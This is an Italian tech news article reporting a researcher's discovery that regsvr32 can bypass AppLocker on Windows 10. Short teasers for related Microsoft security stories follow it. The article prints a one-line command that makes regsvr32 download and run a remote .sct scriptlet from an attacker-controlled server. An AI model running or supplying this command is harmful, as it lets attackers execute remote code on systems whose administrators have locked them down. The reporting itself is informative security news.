Regsvr32 può essere usato per bypassare l'applocker su Windows 10
Video: Allow Windows to Run Specified Programs Only 2024
Un ricercatore del Colorado che prende il nome, Casey Smith, ha scoperto che Regsvr32 può essere utilizzato per bypassare AppLocker su Windows 10 e questo è un grosso problema per gli utenti di computer, in particolare quelli in ambiente aziendale.
AppLocker è stato introdotto per la prima volta in Windows 7 e Windows Server 2008 R2. È progettato per consentire agli amministratori di specificare quale gruppo o utenti possono sfruttare alcune o tutte le applicazioni in base all'identità univoca dei file. Se sei una persona che tende ad usare AppLocker, dovrebbe essere noto che può essere utilizzato per creare determinate regole per consentire alle applicazioni di eseguirle o interromperle.
Per coloro che potrebbero non essere a conoscenza, Regvr32 può essere utilizzato per registrare e annullare la registrazione di DLL. Questo non è uno strumento con un clic visto che è un'utilità da riga di comando, quindi solo gli utenti di computer avanzati dovrebbero cercare di sfruttare ciò che ha da offrire.
Comprendiamo che utilizzando questa tecnica, non altera il registro del sistema informatico, il che rende difficile per gli amministratori sapere se sono state apportate modifiche.
regsvr32 / s / n / u /i:http://server/file.sct scrobj.dll
"La cosa sorprendente qui è che regsvr32 è già a conoscenza del proxy, usa TLS, segue i reindirizzamenti, ecc … E … Hai indovinato un binario MS predefinito firmato. Quindi, tutto ciò che devi fare è ospitare il tuo file.sct in una posizione che controlli ”, ha scritto Smith.
La tecnica sopra descritta non richiede privilegi di amministratore e non modifica il registro. Inoltre, gli script possono essere richiamati sia su HTTP che su HTTPS. Al momento, Microsoft non ha rilasciato una patch per questo piccolo problema, quindi l'unica opzione a questo punto è bloccare Regsvr32 tramite Windows Firewall.
È interessante notare che il gigante del software non ha ancora risposto a questo problema di sicurezza con il suo sistema operativo. Ora che è all'aperto, ci aspettiamo di sentire qualcosa dalla compagnia insieme ai discorsi su una patch futura.
Gli hacker hanno utilizzato Edge per bypassare la workstation vmware durante pwn2own 2017
Il concorso Pwn2Own di quest'anno si è concluso dopo tre giorni di hacking di browser e sistemi operativi. Alla fine, il browser Edge di Microsoft è emerso come il perdente dopo non essere riuscito a scongiurare gli attacchi durante l'evento. Un team della società di sicurezza cinese Qihoo 360 ha sfruttato Edge e ha collegato due difetti di sicurezza per fuggire da un VMware ...
Office 365 non deve essere usato nelle scuole a causa di problemi di privacy
Il governo tedesco ha vietato alle sue scuole di utilizzare Microsoft Office 365. Si consiglia di cercare altri programmi simili.
Il bypass applocker sfrutta per essere risolto con la prossima versione di Windows principale
AppLocker è una funzionalità del sistema operativo Windows e dei server Windows che consente agli amministratori di controllare quali utenti possono eseguire app particolari. Lo strumento utilizza identità univoche di file e consente agli amministratori di creare regole per consentire o bloccare le applicazioni. AppLocker consente agli amministratori di controllare i seguenti tipi di app: file eseguibili (.exe e .com), script (.js, .ps1, .vbs, .cmd, ...
